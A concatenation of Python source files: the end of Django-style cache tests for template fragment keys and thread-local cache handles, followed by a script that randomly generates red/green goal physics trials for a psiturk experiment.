self.assertEqual(key, 'template.cache.a.fragment.d41d8cd98f00b204e9800998ecf8427e')
def test_with_one_vary_on(self):
key = make_template_fragment_key('foo', ['abc'])
self.assertEqual(key,
'template.cache.foo.900150983cd24fb0d6963f7d28e17f72')
def test_with_many_vary_on(self):
key = make_template_fragment_key('bar', ['abc', 'def'])
self.assertEqual(key,
'template.cache.bar.4b35f12ab03cec09beec4c21b2d2fa88')
def test_proper_escaping(self):
key = make_template_fragment_key('spam', ['abc:def%'])
self.assertEqual(key,
'template.cache.spam.f27688177baec990cdf3fbd9d9c3f469')
class CacheHandlerTest(TestCase):
def test_same_instance(self):
"""
Attempting to retrieve the same alias should yield the same instance.
"""
cache1 = caches['default']
cache2 = caches['default']
self.assertIs(cache1, cache2)
def test_per_thread(self):
"""
Requesting the same alias from separate threads should yield separate
instances.
"""
c = []
def runner():
c.append(caches['default'])
for x in range(2):
t = threading.Thread(target=runner)
t.start()
t.join()
self.assertIsNot(c[0], c[1])
|
batchMakeTrials.py
|
from __future__ import division, print_function
from physicsTable import *
from physicsTable.constants import *
import threading
import pygame as pg
import random, os, sys
import numpy as np
import json
defVel = 300
# modified trial folder:
#trialfolder = os.path.join('..','public_html','trials')
trialfolder = os.path.join('..','psiturk-rg','templates', 'trials')
#random.seed(10001)
def makeRect(ul, lr):
return pg.Rect(ul, (lr[0]-ul[0],lr[1]-ul[1]))
def checkOverlap(trial):
walls = [makeRect(w[0],w[1]) for w in trial.normwalls]
goals = [makeRect(g[0],g[1]) for g in trial.goals]
objs = walls + goals
b = trial.ball
if b is not None:
br = makeRect((b[0][0]-b[2],b[1][0]-b[2]),(b[2]*2,b[2]*2))
objs.append(br)
for i in range(len(objs) - 1):
o = objs[i]
cls = o.collidelist(objs[(i+1):])
if cls != -1: return True
return False
def checkCoverage(trial, minsteps = 20, FPS = 40.):
tb = trial.makeTable()
notcovered = True
covered = False
ncovs = 0
while tb.step(1/FPS) is None:
if tb.fullyOcc():
notcovered = False
ncovs += 1
if ncovs >= minsteps: covered = True
else: ncovs = 0
return [notcovered, covered]
def checkSmallVel(v):
x = abs(v[0])
y = abs(v[1])
atan = np.arctan(y/x)
return (atan < np.pi/40) or (atan > 19*np.pi/40)
def MakeRandTrial(name, blocks, occs, covered = False, blockdims = (50,300), occdims = (150, 400), res = (1000, 620), maxfails = 10000):
retry_flag = True
while retry_flag:
fails = 0
chk = False
tr = RedGreenTrial(name, res, def_ball_vel = defVel)
blocksize = (random.randint(blockdims[0],blockdims[1]),random.randint(blockdims[0],blockdims[1]))
pos = (random.randint(0,res[0]-blocksize[0]),random.randint(0,res[1]-blocksize[1]))
lr = (pos[0]+blocksize[0],pos[1]+blocksize[1])
tr.addGoal(pos,lr,REDGOAL,RED)
chk = False
while not chk:
blocksize = (random.randint(blockdims[0],blockdims[1]),random.randint(blockdims[0],blockdims[1]))
pos = (random.randint(0,res[0]-blocksize[0]),random.randint(0,res[1]-blocksize[1]))
lr = (pos[0]+blocksize[0],pos[1]+blocksize[1])
tr.addGoal(pos,lr,GREENGOAL,GREEN)
if checkOverlap(tr):
fails += 1
tr.goals = [tr.goals[0]]
else: chk = True
if fails > maxfails:
print("Resetting trial")
#return MakeRandTrial(name,blocks,occs,covered,blockdims,occdims,res,maxfails)
continue
for i in range(blocks):
chk = False
while not chk:
blocksize = (random.randint(blockdims[0],blockdims[1]),random.randint(blockdims[0],blockdims[1]))
pos = (random.randint(0,res[0]-blocksize[0]),random.randint(0,res[1]-blocksize[1]))
lr = (pos[0]+blocksize[0],pos[1]+blocksize[1])
tr.addWall(pos,lr)
if checkOverlap(tr):
fails += 1
tr.normwalls = tr.normwalls[:-1]
else: chk = True
if fails > maxfails:
print("Resetting trial")
#return MakeRandTrial(name,blocks,occs,covered,blockdims,occdims,res,maxfails)
continue
for i in range(occs):
chk = False
while not chk:
blocksize = (random.randint(blockdims[0],blockdims[1]),random.randint(blockdims[0],blockdims[1]))
pos = (random.randint(0,res[0]-blocksize[0]),random.randint(0,res[1]-blocksize[1]))
lr = (pos[0]+blocksize[0],pos[1]+blocksize[1])
noc = pg.Rect(pos,blocksize)
if noc.collidelist([makeRect(o[0],o[1]) for o in tr.occs]) == -1:
tr.addOcc(pos,lr)
chk = True
else:
fails += 1
bsize = tr.dbr
chk = False
while not chk:
bpos = (random.randint(bsize, res[0]-bsize), random.randint(bsize,res[1]-bsize))
vchk = False
while not vchk:
bvel = (random.random(), random.random())
if not checkSmallVel(bvel): vchk = True
tr.addBall(bpos, bvel)
if checkOverlap(tr):
fails += 1
tr.ball = None
else: chk = True
if fails > maxfails:
print("Resetting trial")
#return MakeRandTrial(name,blocks,occs,covered,blockdims,occdims,res,maxfails)
continue
tr.normalizeVel()
if not tr.checkConsistency(maxsteps=10000):
#return MakeRandTrial(name,blocks,occs,covered,blockdims,occdims,res,maxfails)
continue
if tr.checkConsistency(maxsteps=3000):
print("Too short")
#return MakeRandTrial(name,blocks,occs,covered,blockdims,occdims,res,maxfails)
continue
coverage = checkCoverage(tr)
if covered:
if not coverage[1]:
#return MakeRandTrial(name,blocks,occs,covered,blockdims,occdims,res,maxfails)
continue
else:
if not coverage[0]:
#return MakeRandTrial(name,blocks,occs,covered,blockdims,occdims,res,maxfails)
continue
retry_flag = False
return tr
def threadMakeTrial(nTrials, b):
for i in range(nTrials):
nm = "RTr_Bl" + str(b) + "_" + str(i)
output_path = os.path.join(output_dir, nm + '.ptr')
if not os.path.exists(output_path):
print('Thread ' + str(b) + ': Trial ' + nm, file=sys.stderr)
t = MakeRandTrial(nm, b, 0)
t.save(output_path, askoverwrite=False)
if __name__ == '__main__':
# First arg is number of trials, since there will be
# 5 block variations for each trial, expect an effective
# total of 5*nTrials.
if len(sys.argv) > 1:
nTrials = int(sys.argv[1])
else:
nTrials = 20
# Create directory for output files
output_dir = 'trials'
if not os.path.exists(output_dir):
os.makedirs(output_dir)
threads = []
# Make random trials
for b in range(1,6):
thr = threading.Thread(target=threadMakeTrial, args=(nTrials, b))
thr.start()
threads.append(thr)
for thread in threads:
thread.join()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.